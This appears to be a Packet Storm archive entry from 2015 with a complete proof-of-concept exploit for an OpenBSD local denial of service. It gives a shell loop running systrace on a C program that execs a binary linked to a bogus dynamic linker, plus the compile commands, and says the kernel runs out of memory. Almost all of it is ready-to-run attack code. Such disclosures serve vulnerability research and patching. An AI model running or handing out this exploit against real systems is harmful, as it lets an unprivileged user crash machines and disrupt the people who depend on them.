OpenBSD Local Denial Of Service

2015-07-28T00:00:00
ID PACKETSTORM:132870
Type packetstorm
Reporter Maxime Villard
Modified 2015-07-28T00:00:00

Description

                                        
`/*
* 2015, Maxime Villard  
* Exploit triggering a memory leak in the OpenBSD kernel from an unprivileged  
* user. Found by The Brainy Code Scanner.  
*/  
  
- - - - - - - - - - - - - - - - - script.sh - - - - - - - - - - - - - - - - - -  
  
#! /bin/sh
while true
do
    systrace -A ./exploit
done
  
- - - - - - - - - - - - - - - - - exploit.c - - - - - - - - - - - - - - - - - -  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
  
int main(int argc, char *argv[]) {
    execve("bin", argv, NULL);
}
  
- - - - - - - - - - - - - - - - - - bin.c - - - - - - - - - - - - - - - - - - -  
  
int main() {}  
  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
  
$ gcc -o exploit exploit.c  
$ gcc -Wl,-dynamic-linker,/DEAD -o bin bin.c  
$ ./script.sh  
  
Wait a bit, and the kernel will run out of memory.
`